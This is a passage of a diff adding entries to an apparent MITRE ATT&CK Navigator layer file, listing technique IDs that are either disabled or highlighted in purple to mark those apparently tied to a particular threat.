+        {
+            "enabled": false,
+            "techniqueID": "T1098.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1099"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1100"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1101"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1102"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1102.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1102.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1102.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1103"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1104"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1105"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1106"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1107"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1108"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1109"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1110"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1110.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1110.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1110.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1110.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1111"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1112"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1113"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1114"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1114.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1114.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1114.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1115"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1116"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1117"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1118"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1119"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1120"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1121"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1122"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1123"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1124"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1125"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1126"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1127"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1127.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1128"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1129"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1130"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1131"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1132"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1132.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1132.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1133"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1134"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1134.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1134.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1134.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1134.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1134.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1135"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1136"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1136.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1136.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1136.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1137"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1137.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1137.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1137.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1137.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1137.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1137.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1138"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1139"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1140"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1141"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1142"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1143"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1144"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1145"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1146"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1147"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1148"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1149"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1150"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1151"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1152"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1153"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1154"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1155"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1156"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1157"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1158"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1159"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1160"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1161"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1162"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1163"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1164"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1165"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1166"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1167"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1168"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1169"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1170"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1171"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1172"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1173"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1174"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1175"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1176"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1177"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1178"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1179"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1180"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1181"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1182"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1183"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1184"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1185"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1186"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1187"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1188"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1189"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1190"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1191"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1192"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1193"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1194"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1195"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1195.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1195.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1195.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1196"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1197"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1198"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1199"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1200"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1201"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1202"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1203"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1204"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1204.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1204.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1204.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1205"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1205.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1205.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1206"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1207"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1208"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1209"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1210"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1211"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1212"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1213"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1213.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1213.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1213.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1214"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1215"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1216"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1216.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1217"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1218"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1218.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1218.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1218.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1218.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1218.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1218.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1218.008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1218.009"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1218.010"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1218.011"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1218.012"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1218.013"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1218.014"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1219"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1220"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1221"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1222"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1222.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1222.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1223"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1480"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1480.001"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1482"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1483"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1484"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1484"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1484"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1484.001"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1484.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1485"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1486"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1487"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1488"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1489"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1490"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1491"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1491.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1491.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1492"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1493"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1494"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1495"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1496"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1497"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1497.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1497.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1497.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1498"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1498.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1498.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1499"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1499.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1499.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1499.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1499.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1500"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1501"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1502"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1503"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1504"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1505"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1505.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1505.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1505.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1505.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1505.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1506"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1514"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1518"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1518.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1519"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1522"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1525"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1526"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1527"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1528"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1529"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1530"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1531"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1534"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1535"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1536"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1537"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1538"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1539"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1542"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1542.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1542.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1542.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1542.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1542.005"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1543"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1543.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1543.002"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1543.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1543.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546.008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546.009"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546.010"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546.011"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546.012"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546.013"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546.014"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546.015"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1546.016"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1547"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1547.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1547.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1547.003"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1547.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1547.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1547.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1547.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1547.008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1547.009"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1547.010"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1547.011"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1547.012"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1547.013"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1547.014"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1547.015"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1548"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1548.001"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1548.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1548.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1548.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1548.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1550"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1550.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1550.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1550.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1550.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1552"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1552.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1552.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1552.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1552.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1552.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1552.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1552.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1552.008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1553"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1553.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1553.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1553.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1553.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1553.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1553.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1554"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1555"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1555.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1555.002"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1555.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1555.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1555.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1555.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1556"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1556.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1556.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1556.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1556.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1556.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1556.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1556.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1556.008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1557"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1557.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1557.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1557.003"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1558"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1558.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1558.002"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1558.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1558.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1559"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1559.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1559.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1559.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1560"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1560.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1560.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1560.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1561"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1561.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1561.002"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1562"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1562.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1562.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1562.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1562.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1562.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1562.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1562.008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1562.009"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1562.010"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1562.011"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1562.012"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1563"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1563.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1563.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1564"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1564.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1564.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1564.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1564.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1564.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1564.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1564.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1564.008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1564.009"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1564.010"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1564.011"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1565"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1565.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1565.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1565.003"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1566"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1566"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1566.001"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1566.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1566.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1566.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1566.004"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1567"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1567.001"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1567.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1567.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1567.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1568"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1568.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1568.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1568.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1569"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1569.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1569.002"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1570"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1571"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1572"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1573"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1573.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1573.002"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1574"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1574.001"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1574.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1574.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1574.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1574.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1574.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1574.008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1574.009"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1574.010"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1574.011"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1574.012"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1574.013"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1578"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1578.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1578.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1578.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1578.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1578.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1580"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1583"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1583.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1583.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1583.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1583.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1583.005"
+        },
+        {
+            "enabled": false,
